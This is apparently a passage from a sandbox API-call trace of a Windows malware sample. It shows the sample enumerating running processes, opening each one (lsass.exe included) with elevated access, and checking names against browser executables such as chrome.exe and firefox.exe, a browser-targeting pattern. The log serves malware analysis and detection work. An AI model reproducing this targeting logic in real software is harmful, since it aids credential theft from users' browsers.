	[0229.409] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0229.409] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x64e0
	[0229.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.410] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0229.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.410] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.410] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0229.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.411] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.411] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0229.411] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x64e4
	[0229.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.412] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0229.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.412] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.412] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0229.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.412] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.413] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.413] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x64e8
	[0229.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.413] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.414] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.415] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.415] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.415] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.416] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x64ec
	[0229.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.416] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.417] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.417] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.417] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.417] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.418] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x64f0
	[0229.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.418] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.419] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.419] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.419] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.420] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.420] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x64f4
	[0229.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.421] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.421] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.421] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.422] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.422] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.422] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x64f8
	[0229.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.423] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.423] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.423] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.424] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.424] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.425] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x64fc
	[0229.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.425] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.425] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.425] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.426] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.426] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.427] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x6500
	[0229.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.427] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.427] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.428] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.428] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.428] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0229.429] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x6504
	[0229.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.429] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0229.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.429] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.436] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0229.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.436] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.436] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.437] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x6508
	[0229.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.437] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.438] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.438] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.438] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.439] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0229.439] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x650c
	[0229.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.439] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.440] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.440] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.440] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.441] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0229.441] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x6510
	[0229.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.442] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0229.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.442] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.442] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0229.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.443] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.443] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.444] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x6514
	[0229.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.444] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.444] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.445] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.445] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.446] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0229.447] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x6518
	[0229.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.447] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0229.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.448] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.448] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0229.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.449] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.449] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0229.450] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x651c
	[0229.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.450] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0229.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.451] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.451] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0229.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.451] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.452] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0229.452] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x6520
	[0229.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.453] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0229.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.453] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.453] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0229.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.453] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.454] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0229.454] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x6524
	[0229.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.454] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0229.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.455] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.455] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0229.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.455] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.456] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0229.456] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0229.456] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0229.457] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x6528
	[0229.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.457] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0229.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.458] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.459] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0229.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.459] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.460] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0229.460] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x652c
	[0229.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.461] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0229.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.461] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.462] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0229.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.462] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.462] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0229.463] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x6530
	[0229.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.463] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0229.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.464] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.464] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0229.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.464] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.464] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0229.465] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x6534
	[0229.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.465] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0229.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.466] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.466] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0229.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.466] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.467] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0229.467] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x6538
	[0229.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.468] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0229.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.468] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.469] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0229.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.469] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.470] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0229.470] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x653c
	[0229.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.471] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0229.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.471] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.471] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0229.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.471] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.472] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0229.472] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x6540
